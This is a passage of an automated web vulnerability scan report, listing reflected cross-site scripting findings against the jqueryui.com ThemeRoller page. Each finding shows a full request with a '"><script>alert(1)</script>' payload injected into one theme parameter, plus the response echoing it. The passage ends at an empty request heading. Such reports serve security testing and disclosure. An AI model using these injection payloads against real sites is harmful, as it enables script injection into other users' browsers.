GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=1004287e"><script>alert(1)</script>b19fe4c69d3&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ult=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=1004287e"><script>alert(1)</script>b19fe4c69d3&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgC
...[SNIP]...

4.137. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf8c3"><script>alert(1)</script>e7f1ed5ee7 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20cf8c3"><script>alert(1)</script>e7f1ed5ee7&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120253

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
extureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20cf8c3"><script>alert(1)</script>e7f1ed5ee7&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="t
...[SNIP]...

4.138. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c572"><script>alert(1)</script>d20b36ec1c was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=107c572"><script>alert(1)</script>d20b36ec1c&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120253

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=107c572"><script>alert(1)</script>d20b36ec1c&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px" type="text/css" media="all" />
...[SNIP]...

4.139. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea1af"><script>alert(1)</script>073f89d073f was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.pngea1af"><script>alert(1)</script>073f89d073f&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
nColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.pngea1af"><script>alert(1)</script>073f89d073f&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed
...[SNIP]...

4.140. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd035"><script>alert(1)</script>66642ae8c0e was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.pngbd035"><script>alert(1)</script>66642ae8c0e&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.pngbd035"><script>alert(1)</script>66642ae8c0e&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefau
...[SNIP]...

4.141. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9914"><script>alert(1)</script>6c32ca50cc1 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.pngd9914"><script>alert(1)</script>6c32ca50cc1&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.pngd9914"><script>alert(1)</script>6c32ca50cc1&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&
...[SNIP]...

4.142. http://jqueryui.com/themeroller/ [bgTextureError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58a46"><script>alert(1)</script>37189a3fb88 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png58a46"><script>alert(1)</script>37189a3fb88&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png58a46"><script>alert(1)</script>37189a3fb88&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=0
...[SNIP]...

4.143. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a34e4"><script>alert(1)</script>6f6deb6985f was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.pnga34e4"><script>alert(1)</script>6f6deb6985f&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Theme.css.php?ctl=themeroller&ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.pnga34e4"><script>alert(1)</script>6f6deb6985f&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcC
...[SNIP]...

4.144. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b375"><script>alert(1)</script>7b1d7aa2412 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png8b375"><script>alert(1)</script>7b1d7aa2412&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120190

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png8b375"><script>alert(1)</script>7b1d7aa2412&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a
...[SNIP]...

4.145. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdc19"><script>alert(1)</script>ce6b6f37d34 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

